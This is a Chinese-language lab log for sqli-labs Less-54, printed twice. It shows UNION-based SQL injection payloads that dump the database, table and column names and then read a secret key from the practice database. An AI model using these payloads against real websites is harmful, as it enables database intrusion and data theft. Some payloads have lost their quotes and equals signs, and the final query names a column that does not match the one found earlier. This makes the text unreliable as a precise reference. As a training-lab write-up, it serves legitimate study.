SQLI-LAPS 实验记录Less-54从这一关开始就是第四阶段的sql注入挑战了我们从第一个页面当中发现有一大段提示信息告诉我们从这里开始数据库更换为challenges而不是之前一直使用的security且有了尝试的次数限制即每十次会更新一下系统让我们之前所做的努力全部白费因此这一关我们要珍惜尝试的次数让每一次尝试都具有他的价值。根据之前的经验首先我们在命令行中采用‘’来闭合使用union select联合查询命令?id-1unionselect1,2,3--结果如图所示说明这种方式有效能够爆出具体数据。接下来我们继续使用该语句来进行注入爆出数据库名、表名、列名等语句如下查询库名?id-1unionselect1,database(),3--查询结果为challenges。查询表名?id-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemachallenges),3--查询结果为LHWT8D4CQ9。查询列名?id-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schemachallenges and table_nameLHWT8D4CQ9),3--查询结果为id,sessid,secret_VKHG,tryy。查询秘钥?id-1unionselect1,(selectconcat(secret_H06E)fromchallenges.LHWT8D4CQ9where(id1)),3--之后将查询出的密钥输入页面下方的对话框中就可以看到成功信息了。
sqli-labs-Less-54
SQLI-LAPS 实验记录Less-54从这一关开始就是第四阶段的sql注入挑战了我们从第一个页面当中发现有一大段提示信息告诉我们从这里开始数据库更换为challenges而不是之前一直使用的security且有了尝试的次数限制即每十次会更新一下系统让我们之前所做的努力全部白费因此这一关我们要珍惜尝试的次数让每一次尝试都具有他的价值。根据之前的经验首先我们在命令行中采用‘’来闭合使用union select联合查询命令?id-1unionselect1,2,3--结果如图所示说明这种方式有效能够爆出具体数据。接下来我们继续使用该语句来进行注入爆出数据库名、表名、列名等语句如下查询库名?id-1unionselect1,database(),3--查询结果为challenges。查询表名?id-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemachallenges),3--查询结果为LHWT8D4CQ9。查询列名?id-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schemachallenges and table_nameLHWT8D4CQ9),3--查询结果为id,sessid,secret_VKHG,tryy。查询秘钥?id-1unionselect1,(selectconcat(secret_H06E)fromchallenges.LHWT8D4CQ9where(id1)),3--之后将查询出的密钥输入页面下方的对话框中就可以看到成功信息了。
